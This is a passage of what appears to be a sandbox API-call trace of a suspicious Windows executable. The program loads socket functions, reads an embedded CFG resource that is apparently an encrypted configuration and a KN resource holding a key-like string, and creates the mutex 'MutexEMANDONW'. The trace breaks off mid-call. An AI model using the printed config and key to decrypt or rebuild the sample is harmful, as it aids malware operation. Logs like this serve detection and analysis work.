GetCurrentThreadId () returned 0x3ac [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x19f780, cchData=256 | out: lpLCData="2") returned 2 [0086.532] GetThreadLocale () returned 0x409 [0086.532] EnumCalendarInfoW (lpCalInfoEnumProc=0x4205a0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0086.532] GetThreadLocale () returned 0x409 [0086.532] EnumCalendarInfoW (lpCalInfoEnumProc=0x420644, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0086.532] GetCurrentThreadId () returned 0x3ac [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sun") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sunday") returned 7 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Mon") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Monday") returned 7 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Tue") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Wed") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Thu") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Thursday") returned 9 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Fri") returned 4 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Friday") returned 7 [0086.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Sat") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f77c, cchData=256 | out: lpLCData="Saturday") returned 9 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jan") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x19f780, cchData=256 | out: lpLCData="January") returned 8 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x19f780, cchData=256 | out: lpLCData="Feb") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x19f780, cchData=256 | out: lpLCData="February") returned 9 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x19f780, cchData=256 | out: lpLCData="Mar") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f780, cchData=256 | out: lpLCData="March") returned 6 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x19f780, cchData=256 | out: lpLCData="Apr") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f780, cchData=256 | out: lpLCData="April") returned 6 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x19f780, cchData=256 | out: lpLCData="May") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f780, cchData=256 | out: lpLCData="May") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jun") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f780, cchData=256 | out: lpLCData="June") returned 5 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f780, cchData=256 | out: lpLCData="Jul") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f780, cchData=256 | out: lpLCData="July") returned 5 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f780, cchData=256 | out: lpLCData="Aug") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f780, cchData=256 | out: lpLCData="August") returned 7 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f780, cchData=256 | out: lpLCData="Sep") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x19f780, cchData=256 | out: lpLCData="September") returned 10 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f780, cchData=256 | out: lpLCData="Oct") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x19f780, cchData=256 | out: lpLCData="October") returned 8 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f780, cchData=256 | out: lpLCData="Nov") returned 4 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x19f780, cchData=256 | out: lpLCData="November") returned 9 [0086.533] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f780, cchData=256 | out: lpLCData="Dec") returned 4 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x19f780, cchData=256 | out: lpLCData="December") returned 9 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="$") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=",") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=".") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="2") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x19f9c8, cchData=2 | out: lpLCData="/") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f788, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f788, cchData=256 | out: lpLCData="1") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x19f788, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f788, cchData=256 | out: lpLCData="1") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=":") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="AM") returned 3 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="PM") returned 3 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f7d0, cchData=256 | out: lpLCData="0") returned 2 [0086.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x19f9c8, cchData=2 | out: lpLCData=",") returned 2 [0086.534] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x76ed0000 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAIoctl") returned 0x76eddca0 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="__WSAFDIsSet") returned 0x76ee2f20 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="closesocket") returned 0x76ed9ba0 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="ioctlsocket") returned 0x76edd860 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAGetLastError") returned 0x76ee38d0 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="WSAStartup") returned 0x76ee2420 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="WSACleanup") returned 0x76edda00 [0086.535] GetProcAddress (hModule=0x76ed0000, lpProcName="accept") returned 0x76ee4030 [0086.536] GetProcAddress (hModule=0x76ed0000, lpProcName="bind") returned 0x76ede0f0 [0086.536] GetProcAddress (hModule=0x76ed0000, lpProcName="connect") returned 0x76ee33a0 [0086.536] GetProcAddress (hModule=0x76ed0000, lpProcName="getpeername") returned 0x76ee12c0 [0086.536] GetProcAddress (hModule=0x76ed0000, lpProcName="getsockname") returned 0x76ede030 [0086.536] GetProcAddress (hModule=0x76ed0000, lpProcName="getsockopt") returned 0x76ee1180 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="htonl") returned 0x76ee3670 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="htons") returned 0x76ee3650 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="inet_addr") returned 0x76ee2e90 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="inet_ntoa") returned 0x76ee4b00 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="listen") returned 0x76ee3f40 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="ntohl") returned 0x76ee3670 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="ntohs") returned 0x76ee3650 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="recv") returned 0x76edcff0 [0086.537] GetProcAddress (hModule=0x76ed0000, lpProcName="recvfrom") returned 0x76ee4d60 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="select") returned 0x76ee48e0 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="send") returned 0x76edce20 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="sendto") returned 0x76ee15a0 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="setsockopt") returned 0x76ed9560 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="shutdown") returned 0x76ee14e0 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="socket") returned 0x76ed9780 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostbyaddr") returned 0x76efc600 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostbyname") returned 0x76efc790 [0086.538] GetProcAddress (hModule=0x76ed0000, lpProcName="getprotobyname") returned 0x76efb6d0 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="getprotobynumber") returned 0x76efb820 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="getservbyname") returned 0x76efcad0 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="getservbyport") returned 0x76efccb0 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="gethostname") returned 0x76efc920 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="getaddrinfo") returned 0x76ed52b0 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="freeaddrinfo") returned 0x76ed4b00 [0086.539] GetProcAddress (hModule=0x76ed0000, lpProcName="getnameinfo") returned 0x76ee16a0 [0086.539] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4edec0 | out: lpWSAData=0x4edec0) returned 0 [0086.543] GetACP () returned 0x4e4 [0086.544] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fbd8 | out: lpCPInfo=0x19fbd8) returned 1 [0086.544] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x4f5410 [0086.545] LoadResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x4f7718 [0086.545] SizeofResource (hModule=0x400000, hResInfo=0x4f5410) returned 0x1202 [0086.545] LockResource (hResData=0x4f7718) returned 0x4f7718 [0086.545] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x19fb04 | out: lpCPInfo=0x19fb04) returned 1 [0086.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7b358, cbMultiByte=4610, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4610 [0086.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7b358, cbMultiByte=4610, lpWideCharStr=0x1e7c58c, cchWideChar=4610 | out: lpWideCharStr="38\r\n85CF6029950979882BBF06141B7D65D617B3CAAE045D8F9DF7ABC6AC91AD1597\r\n6B36ADB806D299307C3B694524B3511594B35DC46C548DE50B60746829A09B44\r\nA93FE5A114A457F0E7BB3C353DEFBCBE7620B5C78D008C38ADB62C1F157A9F91\r\n008065B60C2C14DCDFE2C42155B0AB06417BD6B9324A19C1559F7337D100B27E\r\n52BE7B9068A92E295685ED35815218346B44C469212A23350F39E2755EF811B2\r\nB827E874AB04ED767565C6601F90344ACF70A4FE43C702199AFEAD9404CF449D\r\n2C410DE89F6DA5F8FA4DFADB5157FDBCF460A8C9668553BF76491B064568520F\r\n913AC59277EF13FAA98EE14C0BE54D59AA3F7AC9F4ABCAE433A1C493DF12A6D0\r\n60C42CC1CC626AB1DD9DA7B36B302F4C94588475E8F56DE2ADC721991DE4123B\r\nE02B85EEB6F03E4256B973DD5C43CF03144CF3E6C9376E5E322931AE7C83C719\r\nFB528C4AFB55169E172E2E51FCC2B4504A9078BCEC56156DD9B3A987A2153A61\r\nC7382E34A4E0D319B5DBDB3ED628B5E2B34C1588B02519B17D9CE253EF3278E3\r\nB73EC8EA541A10C5B330F39F12C46BB072F3560666F0F0ABE00BBA9CD4BA3749\r\n794D19E85B3EB0A586FDB515C311A5769BC14F049ED74EEC76C18A14BB931BF5\r\nB14D73ED50EF9DCBEC8B3D0B3F15354518140F201A6D874296A7E1107010729C\r\n51A6894B26B68E6A1688CA3EBDD6FE2A568C924608D7A254988BF47B51F00DEE\r\n7174ADAFBFE6EE4E88A3EC1633391C9B8550E83AC12F97BA554B1A727742B68B\r\n58DD73C175614F39E360E8235307825540CE63B1D5F8208275E59A6EC3C9CFD7\r\n06D80BCA0AC8584287E0F2436C9FE19823706A0C0D1F50EAD391B2B6A7B13963\r\nBC9FB7721D55A24738D877710496EEDBFD65F023CFE2AB4B5B4DB180DFE7C875\r\n45D8139DDDE81D65F5D20AA3F2845607AD828B8DF9AB9427D1628DAE22A0A457\r\n5A2FFCE2BCF80105590D1A560BA58CA65B78392228CCD6AC9D1A296FAC704739\r\nB5BDD8D1F0F4464DA6C4571B1458AD3C6257DA433B8A04FD5C83AEB4B1A3EBF6\r\n386E050D22E37BED0402B7DFB917286E37659F8398374066C93FECC849F048E5\r\n44988B6EBB21AAC64EB97EC78A49F1F04DB13F3EF25D4D534D18CF67D7A18E91\r\nB49C7AB116CDE0C89C3A8BF462E7BB8CBE0F25175A2BCDF6D059199388CC246E\r\n2961D4B3FEE0893C7B93B8DA799579DC78B12D064622AE0F8FF82F81BCAB3B1A\r\n210461520ABE732605054E70A0C30517849F08DC56E842CC602B4706F8F100D5\r\nF69E1A56448F7C83E97AA2FD6834F0DDEEB70406257B0D38888A07EB2AC631C3\r\n95AA5724D6944A7F2EDD236CADE1027898A07B571CD3FB88C8372D21D86827DB\r\nE888CA7811AFEB7760BCA58DFC48219A67659B762436162593F42375C2FF0C17\r\n94BDD488E7182D2FA246EB5B0EC93AD1AFEA807305B942BE9079F42E146D3D42\r\n97D887369E40483F32000D9D59AC2991B9D8874625633CDC1AFDD769920AF16A\r\nC0C98F577A41F8A5411FACBBEA5C7BA8AEA64B3932687F91726EFE2FAA06DE79\r\n9AA78B095BF41A9427E79B53084D30EA6E8ADB18BD575F089E5F2CF5EC73F0CB\r\nA4A356E65347BE153709C8F75ECD36A66246A4BD10A22D6D550B349AE89163B8\r\n220D36E5B7F88D66BFAE6EB7B627E2A000FDDE6D80679E9E108776BFB817739D\r\n288640784EC30F4CCEC9351E959DEDF2423DC9545A40296DD71171D69EE828B2\r\n22\r\n230B7E\r\n879028ED80A28B2FB1\r\n321F3ED4720936818DA4CA2A0C305B230F7F6C4F82B9DE5B1A6E41D3838C7CEE7B8B8229BD8ADE3DAAFDBE74BD22F1369E93C215410D338FCBC35609524CF774722B02C64F2D0D9FE9473CE0046B0B0B4DF2A3ECF569E4F0E7C2FAE5397B83FB7530D6E4CD9610A8B78A16775EF308E653BE702ADDEB\r\n090ACA7F1B6F712D3D68F310AF61282C20EF203FB3825DA9656C3F76402FCB712786A457673A6A630E212CB33E1C36DD240243CADCCB76CA68B8DD369B9D7A24721A6E8381FB026630D89406C1395DEBCF0BFEC63626485680B39528EDB244BD9D514A2F7B52954CF113E51D8B85903D93F1B406C5312158FEB5B0CBFA4D5806288A7113A7B375677571165558E45454\r\nE3F47FB4\r\nF6C0254AA93EAA79\r\nB3378708CDF4E7E1CD275A0B\r\nF7\r\n4E303937E934E47A6FA207D3B9283B42\r\nB85D9AFD0838B7F48813EB9FAD2B3AEEB286493D81312261\r\nA7921E40B7541B8C3C5A265EF7FE6AE5D54D9372C701\r\nE3DDBB4991D700C7E6968569ED3BF4A442C67B889397D4DA6BB02EC3480405D44BAF13CCC2\r\nEEB8B4203BAB556EA4DDA72EF62BB130D3\r\n08\r\n4B94\r\n58\r\n5CA297A0551FF278F61316153C7EF498A6863B9F4E82D6C2267C079149FC28497BAED682256D8E0BD67C80DF51FE66EE030303EB940E79AF299B98441BC408CAFAE0E6BB645360F533604A292FACAD452A70F7DF07A7F294047795DA59FB425621C3D6BDDCBA65FA2A5AF01C5EA0FD4C91847FA53764340327A75FCE14284025FD0F6B020EBB33F9DF9A2ABD5EF40DAE974B71B7BBA1364D38565A129E78C3419662ACF41FCA6319640979DD19A83C8F5E7AB3A2F8B9AA37228F404697D2B065CDC2BC26509AA4150605130749C83337D6D63598ECA253BB08AECDB480A23851CBC6A606\r\n100BE2C574C66D3DD43B37D8A138F9331960C35077DA93FA89DC75E2E541F5812C2863E52A953BF7D5FF\r\nF6\r\n95\r\nA47A37EBB4C6DA034CCCF7793856350A632BFBC5524AABAFA11340\r\nF4896D959F65DD8982609066C1165561FF0D0A02BE632DC2CF39E7C8526171\r\n12569EC2BE07673F4E716116A0E3C70A8347\r\nBABB85CE03699CF9BD27CF9AF03F9A8275A7791DCACF0716B81500B0CBC0\r\nA21D084B88BE4468A5D5654299\r\nDCA98FA22FD1EAE60A1BFA579095\r\n0D5DCD0EC00B75F72750FD58A4\r\n71E1463676ADC4DEDA4CBD17F70319292F2BE46BFEEF8DF9BCC3F1C349BACA0DF5C5462C7976E02CADE5D216A1112A76BD5727C4CBE23A4F2A70AA31234695C9B1F7CFF7AC1076A229CFEBA1CE69905B9906024C2D4B59B99825613559C6DD8368D9E8FF43EAA5C91A991D430BF8FA4B3AA93742177A386E88D7A353081A39854EFA\r\n82F14DBD09514D7549E3AB\r\nD54389191F0A3E2229092CD1B2B480422A51E0B3A4A07504BF4D\r\n7B215CFB2A04B1DAF051A043\r\n") returned 4610 [0086.546] FreeResource (hResData=0x4f7718) returned 0 [0086.547] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e89eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜P\x19") returned 1 [0086.547] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e89eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜L\x19") returned 1 [0086.547] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e89eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜H\x19") returned 1 [0086.547] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e89eec, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="1瞜D\x19") returned 1 [0086.547] GetTickCount () returned 0x20b50 [0086.547] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbe8 | out: lpPerformanceCount=0x19fbe8*=13401001177) returned 1 [0086.547] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x45\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.547] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x43\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x35\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x47\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x45\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x4c\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x39\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x72\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x58\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x5a\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x49\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x37\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x46\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x63\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x4a\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fbc4, cbMultiByte=1, lpWideCharStr=0x19ebac, cchWideChar=2047 | out: lpWideCharStr="\x4c\x5c\xfbe4\x19\x65\x61\x75\x74\x33\x32\x2e\x64\x6c\x6c") returned 1 [0086.548] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.548] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.548] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.548] GetFileAttributesW (lpFileName="-n" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\-n")) returned 0xffffffff [0086.549] GetLastError () returned 0x2 [0086.549] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.549] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n" [0086.549] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1e82a8c, cbMultiByte=9, lpWideCharStr=0x19eb3c, cchWideChar=2047 | out: lpWideCharStr="MutexEMAN\x19ﶈ꾫\x19쐈@Ӥ") returned 9 [0086.549] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="MutexEMANDONW") returned 0x0 [0086.549] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="MutexEMANDONW") returned 0x1fc [0086.549] FindResourceW (hModule=0x400000, lpName="LCWL", lpType=0xa) returned 0x4f5460 [0086.549] LoadResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x525ebc [0086.549] SizeofResource (hModule=0x400000, hResInfo=0x4f5460) returned 0x60 [0086.549] LockResource (hResData=0x525ebc) returned 0x525ebc [0086.550] FreeResource (hResData=0x525ebc) returned 0 [0086.550] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0086.550] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0086.550] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0086.550] LockResource (hResData=0x525e94) returned 0x525e94 [0086.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1c90, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0086.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ed1c90, cbMultiByte=38, lpWideCharStr=0x1eae20c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0086.550] FreeResource (hResData=0x525e94) returned 0 [0086.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0086.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1ed1c94, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 